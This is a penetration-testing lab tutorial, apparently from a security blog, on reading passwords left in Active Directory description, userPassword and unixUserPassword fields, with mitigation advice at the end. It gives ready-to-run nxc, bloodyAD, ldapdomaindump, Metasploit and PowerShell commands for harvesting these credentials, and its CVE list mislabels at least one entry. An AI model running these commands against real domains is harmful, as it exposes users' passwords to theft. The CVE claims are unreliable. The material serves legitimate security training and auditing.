Credential Dumping: AD User Comment

[geebee]

In this article, we shall explore different tools & techniques that help us enumerate Active Directory (AD) users’ passwords using which an attacker can expand their access within the organization.

Several critical vulnerabilities in Active Directory (AD) and related services can lead to exposure of password-related information stored in

UserPassword

,

UnixUserPassword

,

unicodePwd

, and

msSFU30Password

attributes. Exploiting these flaws allows attackers to access password hashes or even cleartext passwords there by, significantly increasing the risk of unauthorized access to systems and data. Key attack paths include privilege escalation, improper access control configurations and vulnerabilities in network protocols like SMB or RDP that enable attackers to intercept or access sensitive fields. Notable CVEs that enable such exploits include

CVE-2020-1472 (Zerologon)

,

CVE-2017-0144 (EternalBlue)

,

CVE-2021-33766 (HiveNightmare)

, and

CVE-2019-0708 (BlueKeep)

, all of which if exploited, can lead to unauthorized access to critical password fields in AD.

Table of Contents

• Understanding of Active Directory (AD) password attributes
• Prerequisites
• Lab Setup

Exploitation

• nxc
• bloodyAD
• ldapdomaindump
• MetaSploit
• Get-WmiObject

Mitigation

Understanding of Active Directory (AD) password attributes:

UserPassword: In Active Directory, the

UserPassword

field typically refers to the password hash stored for users (NTLM or sometimes Kerberos hashes). These hashes are used to authenticate users without directly storing plaintext passwords. If attackers gain access to these hashes, they can perform offline attacks (e.g., brute force or dictionary attacks) to try and recover the original passwords.

UnixUserPassword: This field is used when integrating Active Directory with Unix/Linux systems (using services like

SSSD

or

nsswitch.conf

for user authentication). It stores the password hash for Unix-based systems, which is usually a different format (e.g., DES, SHA-512) than Windows hashes.

unicodePwd: The

unicodePwd

attribute in Active Directory holds the password for a user in Unicode format (UTF-16). This field is used by AD when passwords are being set or updated. In a typical AD deployment, this field would not be readable directly through normal LDAP queries due to security restrictions.

msSFU30Password: The

msSFU30Password

attribute is associated with the

Microsoft Services for Unix (SFU)

integration. This field stores passwords used in Unix environments but integrated into Active Directory, similar to the

unixUserPassword

attribute. If a system uses SFU, this field will store the password hash in a Unix-compatible format.

Prerequisites

• Windows Server 2019 as Active Directory Domain Controller
• Tools: nxc, bloodyAD, ldapdomaindump, MetaSploit, Get-WmiObject utility
• Kali Linux
• Windows 10/11 – As Client/Attaker Machine

Lab Setup

In this lab set up, we will create an AD user, then add user description that contains user’s password and provide passwords in “

userPassword

” & “

userUnixPassword

” attributes.

Create the AD Environment

To simulate an Active Directory environment, you will need a Windows Server 2019 as a Domain Controller (DC) and a client/attacker machine (Windows or Linux) where you can run enumeration and exploitation tools.

Domain Controller

Install Windows Server (2016 or 2019 recommended).

• Promote it to a Domain Controller by adding the “Active Directory Domain Services” role.
• Set up the domain (e.g., “local”).
• Create a domain user with username “raj” and password “Password@1”.

Create an AD user and provide user description

Once the AD environment is setup, open PowerShell in Administrative mode in Windows Server and run the below two commands to create the user “divya” with the user “description” attribute containing the password.

Import-module ActiveDirectory
Set-ADUser –Identity “divya” –Description “this is a default password =Password@123”

Using “Get-ADUser” utility and a command like below, we can confirm that a user with “

divya

” as username has been created along with the description provided.

Get-ADUser -Identity "divya" -Properties Description | Select-Object Name, Description

Then navigate to “divya” user’s properties window by following the below steps.

Steps

• Open “Active Directory Users and Computers (ADUC)” on the Domain Controller.
• Enable the “Advanced Features” view by clicking on “View > Advanced Features”.
• Locate user “
  

  divya

  ” in the “Users” container.
• Right-click on “
  

  divya

  ” user and go to “Properties”.

This action opens “General” tab of “divya” user’s Properties window, wherein the “Description” added can be viewed/confirmed.

Update

userPassword

attribute:

Navigate to “Attribute Editor” tab within “

divya

” user’s properties window, select “

userPassword

” attribute and click on “Edit” button. This action opens “Multi-valued Octet String Editor” pop-up window. Click on “Add” button in the new window opened.

Provide “

divya

” user’s password “

Password@123

” in it’s Hexadecimal form within “Value” textarea and click on “OK” button in the “Octet String Attribute Editor” pop-up window.

Update

userUnixPassword

attribute:

Similar to the steps mentioned above in

“Update userPassword attribute”

section, one can select

“userUnixPassword” attribute

and update it’s value to

“admin@123”

.

Select “

userUnixPassword

” attribute and click on “Edit” button. This action opens “Multi-valued Octet String Editor” pop-up window. Click on “Add” button in the new window opened.

Provide “

divya

” user’s Unix Password “

admin@123

” in it’s Hexadecimal form within “Value” textarea and click on “OK” button in the “Octet String Attribute Editor” pop-up window.

Alternatively, one can run below command from the PowerShell window that’s opened in

“Create an AD user and provide user description”

section to update

“divya”

user’s Unix Password as

“admin@123”

.

Set-ADUser -Identity "divya" -Replace @{
uidNumber=1001;
gidNumber=1001;
unixHomeDirectory="/home/linux";
loginShell="/bin/bash";
unixUserPassword="admin@123"
}

Exploitation

nxc

Run the below command from Kali Linux Root Terminal to Get user descriptions stored in Active Directory using “

user-desc

” module of “

nxc

” tool.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M user-desc

Access “

nxc

” tool logs using the below command to revisit the enumerated information at a later time.

cat /root/.nxc/logs/UserDesc-192.168.1.48-20250120_052352.log

Run below commands to further enumerate sensitive information like passwords.

Enumerate AD users’ descriptions, using the module “

get-desc-users

”, which at times may contain passwords.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-desc-users

Enumerate userPassword attribute, using the module “

get-userPassword

”, from all users in ldap.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-userPassword

Enumerate unixUserPassword attribute, using the module “

get-unixUserPassword

”, from all users in ldap.

nxc ldap ignite.local -u raj -p Password@1 -M get-unixUserPassword

bloodyAD

Run the below command to enumerate all users’ sensitive information that is stored in

“userPassword”, “unixUserPassword”, “unicodePassword”

and

“description”

objectClasses.

bloodyAD -u raj -p 'Password@1' -d ignite.local --host 192.168.1.48 get search --filter '(|(userPassword=*)(unixUserPassword=*)(unicodePassword=*)(description=*))' --attr userPassword,unixUserPassword,unicodePwd,description

Output containing sensitive information like passwords and attacks a user is vulnerable to can be observed in below screenshot.

ldapdomaindump

Run below commands to enumerate complete information about the AD under testing, then navigate to “AD_DUMP” directory and list all the files generated upon running “

ldapdomaindump

” tool.

ldapdomaindump -u 'ignite.local\raj' -p Password@1 192.168.1.48 -o AD_DUMP
cd AD_DUMP
ls -al

Now, access “

domain_users.html

” file using a browser. Observe that the attacker could enumerate AD users’ “

description

” attribute that gives away user’s password or the attack technique to which the user is vulnerable to.

MetaSploit

Run MetaSploit Framework Console from Kali Linux Root Terminal using the below command.

Use “

ldap_query

” auxiliary module, set all required options and run the module to enumerate all AD users’ information.

use auxiliary/gather/ldap_query
set action ENUM_ACCOUNTS
set rhosts 192.168.1.48
set username raj
set password Password@1
set domain ignite.local
run

Below output screenshot lists AD users’ information along with their corresponding information stored in AD “

description

” attribute.

Note: Alternatively, we may use “

enum_ad_user_comments

” module and enumerate user’s information along with the information stored in AD “

descsription

” attribute. Below is the list of commands to execute in sequence and the output screenshot upon running listed commands from Kali Linux Root Terminal.

use post/windows/gather/enum_ad_user_comments
set session 1
run

Get-WmiObject

Open PowerShell in Administrative Mode in a Windows Client/Attacker Machine. Then, run the below command to enumerate information like “

username

”, “

SID

” and “

description

” of users’ listed in the command using the “Get-WmiObject” utility.

Get-WmiObject -Class Win32_UserAccount | Where-Object { $_.Name -in @("raj", "divya") } | Select-Object Name, SID, Domain, Description

Mitigation

Vulnerabilities like

CVE-2020-1472 (Zerologon), CVE-2017-0144 (EternalBlue), CVE-2021-33766 (HiveNightmare),

and

CVE-2019-0708 (BlueKeep)

show that

UserPassword, UnixUserPassword, unicodePwd,

and

msSFU30Password

attributes themselves may not post a direct threat in all cases. However, there are various attack vectors that can be used to gain the necessary access to retrieve these password-related fields from Active Directory configuration.

Below listed are the Best-Practices to be followed diligently to remediate and resolve the possibility of enumerating AD users’ passwords.

Use Strong Encryption: Ensure that all communications between clients and domain controllers are encrypted (LDAPS, SMB encryption, etc.) to prevent password hashes from being intercepted. Also, disable legacy authentication protocols such as NTLM where possible.

Limit Access to Password Attributes: Use stringent Access Control Lists (ACLs) to restrict access to sensitive attributes like UserPassword, UnixUserPassword, unicodePwd, and msSFU30Password to only trusted & limited number of administrators.

Regularly Audit AD Permissions: Regularly review and audit the permissions on AD objects to ensure that only authorized users and groups can access sensitive fields.

Apply Security Patches: Ensure all AD and associated systems (like Unix integrations) are regularly patched to prevent exploitation of known vulnerabilities.

Monitor for Privilege Escalation: Use monitoring & alerting tools and practices to detect suspicious activities such as privilege escalation, lateral movement and/or attempts to dump credentials.

Author: Srikrishna is a Cybersecurity leader driving security excellence and mentoring teams to enhance security across products, networks, and organizations.. Contact Here